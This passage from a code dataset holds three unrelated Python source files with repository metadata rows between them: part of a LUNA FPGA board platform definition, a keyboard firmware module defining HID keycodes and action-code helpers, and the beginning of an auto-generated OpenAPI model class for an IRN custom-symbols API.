            # that LVCMOS18D is an invalid I/O type, you'll need to upgrade.
            Subsignal("clk", DiffPairs("B14", "A15", dir="o"), Attrs(IO_TYPE="LVCMOS18D")),
            Subsignal("dq", Pins("A11 B10 B12 A12 B11 A10 B9 A9", dir="io")),
            Subsignal("rwds", Pins( "A13", dir="io")),
            Subsignal("cs", PinsN("A14", dir="o")),
            Subsignal("reset", PinsN("B13", dir="o")),
            Attrs(IO_TYPE="LVCMOS18", SLEWRATE="FAST")
        ),
        # User I/O connections.
        Resource("user_io", 0, Pins("A5", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
        Resource("user_io", 1, Pins("A4", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
        Resource("user_io", 2, Pins("A3", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
        Resource("user_io", 3, Pins("A2", dir="io"), Attrs(IO_TYPE="LVCMOS33", SLEWRATE="FAST")),
    ]
    connectors = [
        # User I/O connector.
        Connector("user_io", 0, """
            A5 - A2
            A4 - A3
        """)
    ]

    def toolchain_prepare(self, fragment, name, **kwargs):
        """ Injects platform-specific bitstream-packing options before build.

        NOTE(review): ecppack is a Lattice ECP5 tool, at odds with the
        IntelPlatform base class — confirm these options are honored.
        """
        overrides = {
            'ecppack_opts': '--compress --idcode {} --freq 38.8'.format(0x21111043)
        }
        return super().toolchain_prepare(fragment, name, **overrides, **kwargs)

    def toolchain_program(self, products, name):
        """ Programs the relevant LUNA board via its sideband connection. """
        from luna.apollo import ApolloDebugger
        from luna.apollo.ecp5 import ECP5_JTAGProgrammer
        # Create our connection to the debug module.
        debugger = ApolloDebugger()
        # Grab our generated bitstream, and upload it to the FPGA.
        bitstream = products.get("{}.bit".format(name))
        with debugger.jtag as jtag:
            programmer = ECP5_JTAGProgrammer(jtag)
            programmer.configure(bitstream)

    def toolchain_flash(self, products, name="top"):
        """ Programs the LUNA board's flash via its sideband connection. """
        from luna.apollo import ApolloDebugger
        from luna.apollo.flash import ensure_flash_gateware_loaded
        # Create our connection to the debug module.
        debugger = ApolloDebugger()
        ensure_flash_gateware_loaded(debugger, platform=self.__class__())
        # Grab our generated bitstream, and upload it to the .
        bitstream = products.get("{}.bit".format(name))
        with debugger.flash as flash:
            flash.program(bitstream)
        # Reset the microcontroller so the new bitstream takes effect.
        debugger.soft_reset()

    def toolchain_erase(self):
        """ Erases the LUNA board's flash. """
        from luna.apollo import ApolloDebugger
        from luna.apollo.flash import ensure_flash_gateware_loaded
        # Create our connection to the debug module.
        debugger = ApolloDebugger()
        ensure_flash_gateware_loaded(debugger, platform=self.__class__())
        with debugger.flash as flash:
            flash.erase()
        # Reset the microcontroller after wiping the flash.
        debugger.soft_reset()
| 37.445887
| 97
| 0.594798
|
4a0f19555db352f34e86bac86f2a04e349d7da48
| 16,262
|
py
|
Python
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 439
|
2020-05-02T03:47:55.000Z
|
2022-03-27T14:42:54.000Z
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 34
|
2020-07-12T15:53:06.000Z
|
2022-03-18T08:38:18.000Z
|
keyboard/action_code.py
|
tywtyw2002/python-keyboard
|
534d1cb56099569993bc9296524392eaee94cbce
|
[
"MIT"
] | 48
|
2020-05-18T15:41:22.000Z
|
2022-03-12T06:44:48.000Z
|
# -*- coding: utf-8 -*-
#
# reference:
# + https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2
#
# fmt: off
NO = '\x00'
TRANSPARENT = '\x01'
# NONE = 0x00 # No key pressed
# Keyboard Error Roll Over - used for all slots if too many keys are pressed ("Phantom key")
# ROLLOVER = 0x01
# 0x02 # Keyboard POST Fail
# 0x03 # Keyboard Error Undefined
# A = 0x04 # Keyboard a and A
# B = 0x05 # Keyboard b and B
# C = 0x06 # Keyboard c and C
# D = 0x07 # Keyboard d and D
# E = 0x08 # Keyboard e and E
# F = 0x09 # Keyboard f and F
# G = 0x0a # Keyboard g and G
# H = 0x0b # Keyboard h and H
# I = 0x0c # Keyboard i and I
# J = 0x0d # Keyboard j and J
# K = 0x0e # Keyboard k and K
# L = 0x0f # Keyboard l and L
# M = 0x10 # Keyboard m and M
# N = 0x11 # Keyboard n and N
# O = 0x12 # Keyboard o and O
# P = 0x13 # Keyboard p and P
# Q = 0x14 # Keyboard q and Q
# R = 0x15 # Keyboard r and R
# S = 0x16 # Keyboard s and S
# T = 0x17 # Keyboard t and T
# U = 0x18 # Keyboard u and U
# V = 0x19 # Keyboard v and V
# W = 0x1a # Keyboard w and W
# X = 0x1b # Keyboard x and X
# Y = 0x1c # Keyboard y and Y
# Z = 0x1d # Keyboard z and Z
A = 'a'
B = 'b'
C = 'c'
D = 'd'
E = 'e'
F = 'f'
G = 'g'
H = 'h'
I = 'i'
J = 'j'
K = 'k'
L = 'l'
M = 'm'
N = 'n'
O = 'o'
P = 'p'
Q = 'q'
R = 'r'
S = 's'
T = 't'
U = 'u'
V = 'v'
W = 'w'
X = 'x'
Y = 'y'
Z = 'z'
# 1 = 0x1e # Keyboard 1 and !
# 2 = 0x1f # Keyboard 2 and @
# 3 = 0x20 # Keyboard 3 and #
# 4 = 0x21 # Keyboard 4 and $
# 5 = 0x22 # Keyboard 5 and %
# 6 = 0x23 # Keyboard 6 and ^
# 7 = 0x24 # Keyboard 7 and &
# 8 = 0x25 # Keyboard 8 and *
# 9 = 0x26 # Keyboard 9 and (
# 0 = 0x27 # Keyboard 0 and )
ENTER = 0x28 # Keyboard Return (ENTER)
ESCAPE = 0x29 # Keyboard ESCAPE
ESC = ESCAPE
BACKSPACE = 0x2a # Keyboard DELETE (Backspace)
TAB = 0x2b # Keyboard Tab
SPACE = 0x2c # Keyboard Spacebar
MINUS = 0x2d # Keyboard - and _
EQUAL = 0x2e # Keyboard = and +
LEFTBRACE = 0x2f # Keyboard [ and {
RIGHTBRACE = 0x30 # Keyboard ] and }
BACKSLASH = 0x31 # Keyboard \ and |
HASHTILDE = 0x32 # Keyboard Non-US # and ~
SEMICOLON = 0x33 # Keyboard ; and :
APOSTROPHE = 0x34 # Keyboard ' and "
QUOTE = 0x34
GRAVE = 0x35 # Keyboard ` and ~
COMMA = 0x36 # Keyboard , and <
DOT = 0x37 # Keyboard . and >
SLASH = 0x38 # Keyboard / and ?
CAPSLOCK = 0x39 # Keyboard Caps Lock
CAPS = CAPSLOCK
F1 = 0x3a # Keyboard F1
F2 = 0x3b # Keyboard F2
F3 = 0x3c # Keyboard F3
F4 = 0x3d # Keyboard F4
F5 = 0x3e # Keyboard F5
F6 = 0x3f # Keyboard F6
F7 = 0x40 # Keyboard F7
F8 = 0x41 # Keyboard F8
F9 = 0x42 # Keyboard F9
F10 = 0x43 # Keyboard F10
F11 = 0x44 # Keyboard F11
F12 = 0x45 # Keyboard F12
PRINTSCREEN = 0x46 # Keyboard Print Screen
PRTSCN = PRINTSCREEN
SCROLLLOCK = 0x47 # Keyboard Scroll Lock
PAUSE = 0x48 # Keyboard Pause
INSERT = 0x49 # Keyboard Insert
HOME = 0x4a # Keyboard Home
PAGEUP = 0x4b # Keyboard Page Up
PGUP = PAGEUP
DELETE = 0x4c # Keyboard Delete Forward
DEL = DELETE
END = 0x4d # Keyboard End
PAGEDOWN = 0x4e # Keyboard Page Down
PGDN = PAGEDOWN
RIGHT = 0x4f # Keyboard Right Arrow
LEFT = 0x50 # Keyboard Left Arrow
DOWN = 0x51 # Keyboard Down Arrow
UP = 0x52 # Keyboard Up Arrow
NUMLOCK = 0x53 # Keyboard Num Lock and Clear
KPSLASH = 0x54 # Keypad /
KPASTERISK = 0x55 # Keypad *
KPMINUS = 0x56 # Keypad -
KPPLUS = 0x57 # Keypad +
KPENTER = 0x58 # Keypad ENTER
KP1 = 0x59 # Keypad 1 and End
KP2 = 0x5a # Keypad 2 and Down Arrow
KP3 = 0x5b # Keypad 3 and PageDn
KP4 = 0x5c # Keypad 4 and Left Arrow
KP5 = 0x5d # Keypad 5
KP6 = 0x5e # Keypad 6 and Right Arrow
KP7 = 0x5f # Keypad 7 and Home
KP8 = 0x60 # Keypad 8 and Up Arrow
KP9 = 0x61 # Keypad 9 and Page Up
KP0 = 0x62 # Keypad 0 and Insert
KPDOT = 0x63 # Keypad . and Delete
# 102ND = 0x64 # Keyboard Non-US \ and |
APPLICATION = 0x65 # Keyboard Application
MENU = APPLICATION
POWER = 0x66 # Keyboard Power
KPEQUAL = 0x67 # Keypad =
F13 = 0x68 # Keyboard F13
F14 = 0x69 # Keyboard F14
F15 = 0x6a # Keyboard F15
F16 = 0x6b # Keyboard F16
F17 = 0x6c # Keyboard F17
F18 = 0x6d # Keyboard F18
F19 = 0x6e # Keyboard F19
F20 = 0x6f # Keyboard F20
F21 = 0x70 # Keyboard F21
F22 = 0x71 # Keyboard F22
F23 = 0x72 # Keyboard F23
F24 = 0x73 # Keyboard F24
OPEN = 0x74 # Keyboard Execute
HELP = 0x75 # Keyboard Help
# PROPS = 0x76 # Keyboard Menu
SELECT = 0x77 # Keyboard Select
STOP = 0x78 # Keyboard Stop
AGAIN = 0x79 # Keyboard Again
UNDO = 0x7a # Keyboard Undo
CUT = 0x7b # Keyboard Cut
COPY = 0x7c # Keyboard Copy
PASTE = 0x7d # Keyboard Paste
FIND = 0x7e # Keyboard Find
MUTE = 0x7f # Keyboard Mute
# VOLUMEUP = 0x80 # Keyboard Volume Up
# VOLUMEDOWN = 0x81 # Keyboard Volume Down
# 0x82 Keyboard Locking Caps Lock
# 0x83 Keyboard Locking Num Lock
# 0x84 Keyboard Locking Scroll Lock
KPCOMMA = 0x85 # Keypad Comma
# 0x86 Keypad Equal Sign
INT1 = 0x87
INT2 = 0x88
INT3 = 0x89
INT4 = 0x8a
INT5 = 0x8b
INT6 = 0x8c
INT7 = 0x8d
INT8 = 0x8e
INT9 = 0x8f
RO = 0x87 # Keyboard International1
KATAKANAHIRAGANA = 0x88 # Keyboard International2
YEN = 0x89 # Keyboard International3
HENKAN = 0x8a # Keyboard International4
MUHENKAN = 0x8b # Keyboard International5
KPJPCOMMA = 0x8c # Keyboard International6
# 0x8d Keyboard International7
# 0x8e Keyboard International8
# 0x8f Keyboard International9
LANG1 = 0x90
LANG2 = 0x91
LANG3 = 0x92
LANG4 = 0x93
LANG5 = 0x94
LANG6 = 0x95
LANG7 = 0x96
LANG8 = 0x97
LANG9 = 0x98
HANGEUL = 0x90 # Keyboard LANG1
HANJA = 0x91 # Keyboard LANG2
KATAKANA = 0x92 # Keyboard LANG3
HIRAGANA = 0x93 # Keyboard LANG4
ZENKAKUHANKAKU = 0x94 # Keyboard LANG5
# 0x95 Keyboard LANG6
# 0x96 Keyboard LANG7
# 0x97 Keyboard LANG8
# 0x98 Keyboard LANG9
# 0x99 Keyboard Alternate Erase
# 0x9a Keyboard SysReq/Attention
# 0x9b Keyboard Cancel
# 0x9c Keyboard Clear
# 0x9d Keyboard Prior
# 0x9e Keyboard Return
# 0x9f Keyboard Separator
# 0xa0 Keyboard Out
# 0xa1 Keyboard Oper
# 0xa2 Keyboard Clear/Again
# 0xa3 Keyboard CrSel/Props
# 0xa4 Keyboard ExSel
# 0xb0 Keypad 00
# 0xb1 Keypad 000
# 0xb2 Thousands Separator
# 0xb3 Decimal Separator
# 0xb4 Currency Unit
# 0xb5 Currency Sub-unit
KPLEFTPAREN = 0xb6 # Keypad (
KPRIGHTPAREN = 0xb7 # Keypad )
# 0xb8 Keypad {
# 0xb9 Keypad }
# 0xba Keypad Tab
# 0xbb Keypad Backspace
# 0xbc Keypad A
# 0xbd Keypad B
# 0xbe Keypad C
# 0xbf Keypad D
# 0xc0 Keypad E
# 0xc1 Keypad F
# 0xc2 Keypad XOR
# 0xc3 Keypad ^
# 0xc4 Keypad %
# 0xc5 Keypad <
# 0xc6 Keypad >
# 0xc7 Keypad &
# 0xc8 Keypad &&
# 0xc9 Keypad |
# 0xca Keypad ||
# 0xcb Keypad :
# 0xcc Keypad #
# 0xcd Keypad Space
# 0xce Keypad @
# 0xcf Keypad !
# 0xd0 Keypad Memory Store
# 0xd1 Keypad Memory Recall
# 0xd2 Keypad Memory Clear
# 0xd3 Keypad Memory Add
# 0xd4 Keypad Memory Subtract
# 0xd5 Keypad Memory Multiply
# 0xd6 Keypad Memory Divide
# 0xd7 Keypad +/-
# 0xd8 Keypad Clear
# 0xd9 Keypad Clear Entry
# 0xda Keypad Binary
# 0xdb Keypad Octal
# 0xdc Keypad Decimal
# 0xdd Keypad Hexadecimal
LEFT_CTRL = 0xe0 # Keyboard Left Control
LEFT_SHIFT = 0xe1 # Keyboard Left Shift
LEFT_ALT = 0xe2 # Keyboard Left Alt
LEFT_GUI = 0xe3 # Keyboard Left GUI
RIGHT_CTRL = 0xe4 # Keyboard Right Control
RIGHT_SHIFT = 0xe5 # Keyboard Right Shift
RIGHT_ALT = 0xe6 # Keyboard Right Alt
RIGHT_GUI = 0xe7 # Keyboard Right GUI
LCTRL = LEFT_CTRL
LSHIFT = LEFT_SHIFT
LALT = LEFT_ALT
LGUI = LEFT_GUI
RCTRL = RIGHT_CTRL
RSHIFT = RIGHT_SHIFT
RALT = RIGHT_ALT
RGUI = RIGHT_GUI
CTRL = LEFT_CTRL
SHIFT = LEFT_SHIFT
ALT = LEFT_ALT
GUI = LEFT_GUI
ASCII_TO_KEYCODE = (
b'\x00' # NUL
b'\x01' # SOH as TRANSPARENT
b'\x00' # STX
b'\x00' # ETX
b'\x00' # EOT
b'\x00' # ENQ
b'\x00' # ACK
b'\x00' # BEL \a
b'\x2a' # BS BACKSPACE \b
b'\x2b' # TAB \t
b'\x28' # LF \n RETURN / ENTER
b'\x00' # VT \v
b'\x00' # FF \f
b'\x28' # CR \r as RETURN
b'\x00' # SO
b'\x00' # SI
b'\x00' # DLE
b'\x00' # DC1
b'\x00' # DC2
b'\x00' # DC3
b'\x00' # DC4
b'\x00' # NAK
b'\x00' # SYN
b'\x00' # ETB
b'\x00' # CAN
b'\x00' # EM
b'\x00' # SUB
b'\x29' # ESC
b'\x00' # FS
b'\x00' # GS
b'\x00' # RS
b'\x00' # US
b'\x2c' # SPACE
b'\x9e' # ! (shift 1)
b'\xb4' # ' (shift ')
b'\xa0' # # (shift 3)
b'\xa1' # $ (shift 4)
b'\xa2' # % (shift 5)
b'\xa4' # & (shift 7)
b'\x34' # '
b'\xa6' # ( (shift 9)
b'\xa7' # ) (shift 0)
b'\xa5' # * (shift 8)
b'\xae' # + (shift =)
b'\x36' # ,
b'\x2d' # -
b'\x37' # .
b'\x38' # /
b'\x27' # 0
b'\x1e' # 1
b'\x1f' # 2
b'\x20' # 3
b'\x21' # 4
b'\x22' # 5
b'\x23' # 6
b'\x24' # 7
b'\x25' # 8
b'\x26' # 9
b'\xb3' # : (shift ;)
b'\x33' # ;
b'\xb6' # < (shift ,)
b'\x2e' # =
b'\xb7' # > (shift .)
b'\xb8' # ? (shift /)
b'\x9f' # @ (shift 2)
b'\x84' # A
b'\x85' # B
b'\x86' # C
b'\x87' # D
b'\x88' # E
b'\x89' # F
b'\x8a' # G
b'\x8b' # H
b'\x8c' # I
b'\x8d' # J
b'\x8e' # K
b'\x8f' # L
b'\x90' # M
b'\x91' # N
b'\x92' # O
b'\x93' # P
b'\x94' # Q
b'\x95' # R
b'\x96' # S
b'\x97' # T
b'\x98' # U
b'\x99' # V
b'\x9a' # W
b'\x9b' # X
b'\x9c' # Y
b'\x9d' # Z
b'\x2f' # [
b'\x31' # \ backslash
b'\x30' # ]
b'\xa3' # ^ (shift 6)
b'\xad' # _ (shift -)
b'\x35' # `
b'\x04' # a
b'\x05' # b
b'\x06' # c
b'\x07' # d
b'\x08' # e
b'\x09' # f
b'\x0a' # g
b'\x0b' # h
b'\x0c' # i
b'\x0d' # j
b'\x0e' # k
b'\x0f' # l
b'\x10' # m
b'\x11' # n
b'\x12' # o
b'\x13' # p
b'\x14' # q
b'\x15' # r
b'\x16' # s
b'\x17' # t
b'\x18' # u
b'\x19' # v
b'\x1a' # w
b'\x1b' # x
b'\x1c' # y
b'\x1d' # z
b'\xaf' # { (shift [)
b'\xb1' # | (shift \)
b'\xb0' # } (shift ])
b'\xb5' # ~ (shift `)
b'\x4c' # DEL DELETE Forward
)
# /* Key Actions */
# ACT_MODS = 0b0000,
# ACT_LMODS = 0b0000,
# ACT_RMODS = 0b0001,
# ACT_MODS_TAP = 0b0010,
# ACT_LMODS_TAP = 0b0010,
# ACT_RMODS_TAP = 0b0011,
# /* Other Keys */
# ACT_USAGE = 0b0100,
# ACT_MOUSEKEY = 0b0101,
# /* Layer Actions */
# ACT_LAYER = 0b1000,
# ACT_LAYER_TAP = 0b1010, /* Layer 0-15 */
# ACT_LAYER_TAP_EXT = 0b1011, /* Layer 16-31 */
# /* Extensions */
# ACT_MACRO = 0b1100,
# ACT_BACKLIGHT = 0b1101,
# ACT_COMMAND = 0b1110,
# ACT_FUNCTION = 0b1111
# };
# Action kinds: the top 4 bits of a 16-bit action code (see ACTION below).
ACT_MODS = 0b0000
ACT_MODS_TAP = 0b0010
ACT_USAGE = 0b0100
ACT_MOUSEKEY = 0b0101
ACT_LAYER = 0b1000
ACT_LAYER_TAP = 0b1010 # Layer 0-15
ACT_LAYER_TAP_EXT = 0b1011 # Layer 16-31
ACT_MACRO = 0b1100
ACT_BACKLIGHT = 0b1101
ACT_COMMAND = 0b1110
ACT_FUNCTION = 0b1111
# Bit operations for ACT_LAYER actions (2-bit "op" field).
OP_BIT_AND = 0
OP_BIT_OR = 1
OP_BIT_XOR = 2
OP_BIT_SET = 3
# "on" field of ACT_LAYER actions: when the bit operation is applied.
ON_PRESS = 1
ON_RELEASE = 2
ON_BOTH = 3
# Sentinel key value used by LAYER_TAP to mean "tap toggles the layer".
OP_TAP_TOGGLE = 0xF0
# convert keyname to action code
def get_action_code(x):
    """Translate a key name into a raw HID action code.

    Accepts a keycode int (single digits 0-9 are looked up as their ASCII
    character), a one-character string, or None (mapped to 0).  Anything
    else raises ValueError.  Booleans deliberately fail the exact ``int``
    type check and are rejected.
    """
    if x is None:
        return 0
    if type(x) is int:
        if x > 9:
            return x
        return ASCII_TO_KEYCODE[ord(str(x))]
    if type(x) is str and len(x) == 1:
        # Mask off the table's high bit, which marks shifted characters.
        return ASCII_TO_KEYCODE[ord(x)] & 0x7F
    raise ValueError('Invalid keyname {}'.format(x))
def MODS(*args):
    """Combine modifier keycodes into the packed 5-bit modifier field.

    Left-hand modifiers set bits 0-3; right-hand modifiers additionally
    set bit 4 (0x10).  Raises ValueError for any non-modifier argument.
    """
    bit_map = {
        LCTRL: 1,
        LSHIFT: 2,
        LALT: 4,
        LGUI: 8,
        RCTRL: 0x11,
        RSHIFT: 0x12,
        RALT: 0x14,
        RGUI: 0x18,
    }
    result = 0
    for key in args:
        if key not in bit_map:
            raise ValueError('Invalid modifier {}'.format(key))
        result |= bit_map[key]
    return result
def mods_to_keycodes(mods):
    """Expand a modifier mask (as built by MODS) back into keycodes.

    Bit 4 (0x10) selects the right-hand modifier block; bits 0-3 are
    offsets from the base (L/R)CTRL keycode.
    """
    base = RCTRL if mods & 0x10 else LCTRL
    return [base + bit for bit in range(4) if (mods >> bit) & 1]
# An action is a 16-bit value: a 4-bit kind (ACT_*) in the high nibble
# plus a kind-specific 12-bit parameter.
ACTION = lambda kind, param: (kind << 12) | param
# Modifier(s) held with a key / modifier-or-tap dual-role key.
MODS_KEY = lambda mods, key: ACTION(ACT_MODS, (mods << 8) | get_action_code(key))
MODS_TAP = lambda mods, key: ACTION(ACT_MODS_TAP, (mods << 8) | get_action_code(key))
MOUSEKEY = lambda key: ACTION(ACT_MOUSEKEY, key)
# Layer bit operation: op (OP_BIT_*), 4-bit part index, 5-bit bits value,
# and when to apply it (ON_*).
LAYER_BITOP = lambda op, part, bits, on: ACTION(ACT_LAYER, op<<10|on<<8|part<<5|(bits&0x1f))
LAYER_BIT_XOR = lambda part, bits, on: LAYER_BITOP(OP_BIT_XOR, part, bits, on)
# BUG FIX: use floor division. `layer / 4` yields a float on Python 3,
# which makes the bit shifts inside LAYER_BITOP raise TypeError.
LAYER_INVERT = lambda layer, on: LAYER_BIT_XOR(layer // 4, 1 << (layer % 4), on)
LAYER_TOGGLE = lambda layer: LAYER_INVERT(layer, ON_RELEASE)
# Tap for `key`, hold to activate `layer`; OP_TAP_TOGGLE as the key means
# the tap toggles the layer instead.
LAYER_TAP = lambda layer, key=NO: ACTION(ACT_LAYER_TAP, (layer << 8) | get_action_code(key))
LAYER_TAP_TOGGLE = lambda layer: LAYER_TAP(layer, OP_TAP_TOGGLE)
LAYER_MODS = lambda layer, mods: LAYER_TAP(layer, 0xC0 | mods)
# HID usage actions: bit 10 of the parameter distinguishes the consumer
# page from the system page.
ACTION_USAGE_SYSTEM = lambda n: ACTION(ACT_USAGE, n)
ACTION_USAGE_CONSUMER = lambda n: ACTION(ACT_USAGE, 1 << 10 | (n))
ACTION_MOUSEKEY = lambda key: ACTION(ACT_MOUSEKEY, key)
# Mouse button actions: one bit per button in the low byte of the parameter.
MS_BTN1 = MOUSEKEY(1 << 0)
MS_BTN2 = MOUSEKEY(1 << 1)
MS_BTN3 = MOUSEKEY(1 << 2)
MS_BTN4 = MOUSEKEY(1 << 3)
MS_BTN5 = MOUSEKEY(1 << 4)
# Mouse movement / wheel actions: a small code in the second byte, used as
# an index into MS_MOVEMENT below.
MS_UP = MOUSEKEY(1 << 8)
MS_DN = MOUSEKEY(2 << 8)
MS_LT = MOUSEKEY(3 << 8)
MS_RT = MOUSEKEY(4 << 8)
MS_UL = MOUSEKEY(5 << 8)
MS_UR = MOUSEKEY(6 << 8)
MS_DL = MOUSEKEY(7 << 8)
MS_DR = MOUSEKEY(8 << 8)
MS_W_UP = MOUSEKEY(9 << 8)
MS_W_DN = MOUSEKEY(10 << 8)
# Per-code movement deltas, indexed by the codes above (entry 0 = no-op).
# Presumably (dx, dy, wheel) with negative y meaning "up" — TODO confirm
# against the code that builds the mouse HID report.
MS_MOVEMENT = (
    (0, 0, 0),
    (0, -2, 0), (0, 2, 0), (-2, 0, 0), (2, 0, 0),
    (-1, -1, 0), (1, -1, 0), (-1, 1, 0), (1, 1, 0),
    (0, 0, 1), (0, 0, -1)
)
# Run user macro number n.
MACRO = lambda n: ACTION(ACT_MACRO, n)
# Backlight / RGB sub-action number n.
BACKLIGHT = lambda n: ACTION(ACT_BACKLIGHT, n)
RGB_TOGGLE = BACKLIGHT(0)
RGB_MOD = BACKLIGHT(1)
MOD_RGB = BACKLIGHT(2)
RGB_HUE = BACKLIGHT(3)
HUE_RGB = BACKLIGHT(4)
RGB_SAT = BACKLIGHT(5)
SAT_RGB = BACKLIGHT(6)
RGB_VAL = BACKLIGHT(7)
VAL_RGB = BACKLIGHT(8)
# Command action: `opt` selects a command group, `n` the command in it.
COMMAND = lambda opt, n: ACTION(ACT_COMMAND, opt << 8 | n)
# Group 0: system-level commands.
BOOTLOADER = COMMAND(0, 0)
HEATMAP = COMMAND(0, 1)
SUSPEND = COMMAND(0, 2)
SHUTDOWN = COMMAND(0, 3)
USB_TOGGLE = COMMAND(0, 4)
# Group 1: Bluetooth. BT(n) selects pairing slot n; 0xFF/0xFE/0xFD are
# toggle/on/off pseudo-slots.
BT = lambda n: COMMAND(1, n)
BT0 = BT(0)
BT1 = BT(1)
BT2 = BT(2)
BT3 = BT(3)
BT4 = BT(4)
BT5 = BT(5)
BT6 = BT(6)
BT7 = BT(7)
BT8 = BT(8)
BT9 = BT(9)
BT_TOGGLE = BT(0xFF)
BT_ON = BT(0xFE)
BT_OFF = BT(0xFD)
# Consumer Page(0x0C)
# Media / application-control actions wrapping HID Consumer Page usage IDs.
AUDIO_MUTE = ACTION_USAGE_CONSUMER(0x00E2)
AUDIO_VOL_UP = ACTION_USAGE_CONSUMER(0x00E9)
AUDIO_VOL_DOWN = ACTION_USAGE_CONSUMER(0x00EA)
TRANSPORT_NEXT_TRACK = ACTION_USAGE_CONSUMER(0x00B5)
TRANSPORT_PREV_TRACK = ACTION_USAGE_CONSUMER(0x00B6)
TRANSPORT_STOP = ACTION_USAGE_CONSUMER(0x00B7)
TRANSPORT_STOP_EJECT = ACTION_USAGE_CONSUMER(0x00CC)
TRANSPORT_PLAY_PAUSE = ACTION_USAGE_CONSUMER(0x00CD)
# application launch
APPLAUNCH_CC_CONFIG = ACTION_USAGE_CONSUMER(0x0183)
APPLAUNCH_EMAIL = ACTION_USAGE_CONSUMER(0x018A)
APPLAUNCH_CALCULATOR = ACTION_USAGE_CONSUMER(0x0192)
APPLAUNCH_LOCAL_BROWSER = ACTION_USAGE_CONSUMER(0x0194)
# application control
APPCONTROL_SEARCH = ACTION_USAGE_CONSUMER(0x0221)
APPCONTROL_HOME = ACTION_USAGE_CONSUMER(0x0223)
APPCONTROL_BACK = ACTION_USAGE_CONSUMER(0x0224)
APPCONTROL_FORWARD = ACTION_USAGE_CONSUMER(0x0225)
APPCONTROL_STOP = ACTION_USAGE_CONSUMER(0x0226)
APPCONTROL_REFRESH = ACTION_USAGE_CONSUMER(0x0227)
APPCONTROL_BOOKMARKS = ACTION_USAGE_CONSUMER(0x022A)
# supplement for Bluegiga iWRAP HID(not supported by Windows?)
APPLAUNCH_LOCK = ACTION_USAGE_CONSUMER(0x019E)
TRANSPORT_RECORD = ACTION_USAGE_CONSUMER(0x00B2)
TRANSPORT_FAST_FORWARD = ACTION_USAGE_CONSUMER(0x00B3)
TRANSPORT_REWIND = ACTION_USAGE_CONSUMER(0x00B4)
TRANSPORT_EJECT = ACTION_USAGE_CONSUMER(0x00B8)
APPCONTROL_MINIMIZE = ACTION_USAGE_CONSUMER(0x0206)
# https://docs.microsoft.com/en-us/windows-hardware/drivers/hid/display-brightness-control
DISPLAY_BRIGHTNESS_UP = ACTION_USAGE_CONSUMER(0x006F)
DISPLAY_BRIGHTNESS_DOWN = ACTION_USAGE_CONSUMER(0x0070)
| 25.409375
| 102
| 0.610319
|
4a0f197fa1bb5bc946bb63577c729952a1240772
| 10,911
|
py
|
Python
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
IRN API v1
Allows users to extract, create, update and configure IRN data. # noqa: E501
The version of the OpenAPI document: 1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.IRNCustomSymbols.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.IRNCustomSymbols.exceptions import ApiAttributeError
class StandardSymbolDto(ModelNormal):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """
    # This model declares no enum-constrained and no validated attributes.
    allowed_values = {
    }
    validations = {
    }
    additional_properties_type = None
    _nullable = False
    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        return {
            'standard_symbol': (str,),  # noqa: E501
        }
    @cached_property
    def discriminator():
        return None
    attribute_map = {
        'standard_symbol': 'standardSymbol',  # noqa: E501
    }
    read_only_vars = {
    }
    _composed_schemas = {}
    @classmethod
    @convert_js_args_to_python_args
    def _from_openapi_data(cls, standard_symbol, *args, **kwargs):  # noqa: E501
        """StandardSymbolDto - a model defined in OpenAPI

        Deserialization-side constructor: unlike ``__init__`` it does not
        enforce read-only attributes.

        Args:
            standard_symbol (str):
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
